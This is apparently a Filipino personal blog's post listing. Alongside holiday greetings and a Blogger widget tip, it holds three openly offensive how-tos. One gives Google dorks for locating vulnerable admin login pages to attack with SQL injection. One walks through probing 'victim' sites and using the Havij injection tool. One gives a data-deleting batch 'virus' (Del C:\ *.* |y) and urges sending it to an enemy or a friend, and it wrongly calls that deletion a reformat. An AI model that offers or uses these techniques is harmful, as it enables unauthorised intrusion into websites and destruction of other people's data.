Posts

Life Hacking

Image
Good Day blogger, It's been a while since I posted on my blog. But here is an interesting video from You Tube that I want to share with you and I think that everyone needs to know this tricks. Because it can make your life easy :D Life hacking refers to any trick, shortcut, skill, or novelty method that increases productivity and efficiency, in all walks of life. It is arguably a modern appropriation of cutting the Gordian Knot - in other words, anything that solves an everyday problem in an inspired, ingenious manner. So Enjoy The video tutorial and don't forget to listen carefully, Have a nice day everyone :D

Happy New Year 2015

Image
I been so busy for this past few days preparing for  Christmas and new year. But I think its never to late to greet everyone a Happy New Year, Yes! It's 2015 I wish you all the best for this new year. A new year to change what is not good last year. So whats your New Years Resolution guys?

Merry Christmas 2014

Image
Hey there blogger! Its Christmas! the most awaited time of the year, specially for us pinoys. From the country which Christians is the majority of the population. :D Well Christmas is not just about the food, party and beer. Let us all remember real meaning of Christmas is remembering the selfless love of Jesus,  So lets enjoy Christmas by living the life  what Jesus wants. A life full of love not just for our selves but also for others: Merry Christmas All :D Best Regards byruz..

HOW: Rocket to Top - Blogger

Image
      Good day blogger :D   I just want to share a cool add on to your blogger page, Turn you old fashion “ back to top arrow” to a cool and stylish with cool effect rocket to TOP add on. Same as the one that you can find at my blog.   First go to blogger.com and to your blog where you want to add the add on. Then go TEMPLATE and click EDIT HTML, now CTRL + F and search for . Just before or above the tag copy and paste the code below.       If you have problems, please comment below and ill try my best to answer all your questions:D   Happy blogging :D

HOW: Hacking Admin Panel Using SQL Injection

Image
Good Day Blogger! Today we will hack Admin Panel for website's that are vulnerable to SQL injection. For those who are new to Hacking Websites SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. So lets start hacking! NOTE: Website hacking is illegal so hide your IP addresse or use proxy servers.  First we search for a possible vulnerable site, we use google dorks to search for it.  So you just try pasting one of the code below and hit search. GOOGLE DORKS: inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx After we select any website. Then we will be directed to the Admin Log in page. So in the username and password field we insert the SQL injection queries.  EXAMPLE:     ...

How: Hack Websites Using Havij

Image
Hey blogger, Stormy weather here in the Philippines. Due to tropical storm Hagupit or locally named Ruby. But today we will not be talking about literal storms but how we can possibly be a dangerous storm to the web. here is a powerful tool for injecting sql to a website. I'm talking about Havij. you can download Havij on the link below. First we need to find a vulnerable webpage/s we can use this google dorks to find this pages. Below is a list of google doeks you can use to search for possible vulnerable webpages. Link: http://www.cometohack.com/2014/05/5000-fresh-google-dorks-list-for-sql_7713.html After we have chosen a victim page we now try to test if it is vulnerable to SQL injection. we put a single quote ( ' ) to the end of the pages url. like the example below ex. http://www.victim.com/accinfo.php?cartId=2 ' <= here we add the single quote. If errors are shown in the page like sql error or something changes in the webpage then the page is vulner...

HOW: Batch Virus (Simple)

Image
Hey blogger!         Today we will be making a VIRUS!. This time we will make a simple batch file that totally reformat your Drive C. Well it is where commonly we install our operating system. So good bye computer hehehe. Just follow the simple steps below. Note: Don't try executing the code on your own PC, maybe to a friends computer hehehehe.. STEP 1: We open Note Pad. STEP 2: Copy and paste this code:   @Echo off  Del C:\ *.* |y  STEP 3: Save it as Filename.bat. And WALAH! your done. you may now try sending this code to a enemy or a friend. Good luck :D NOTE: I am not responsible for any damage, Its your choice. I only suggest hehehe :D - byruz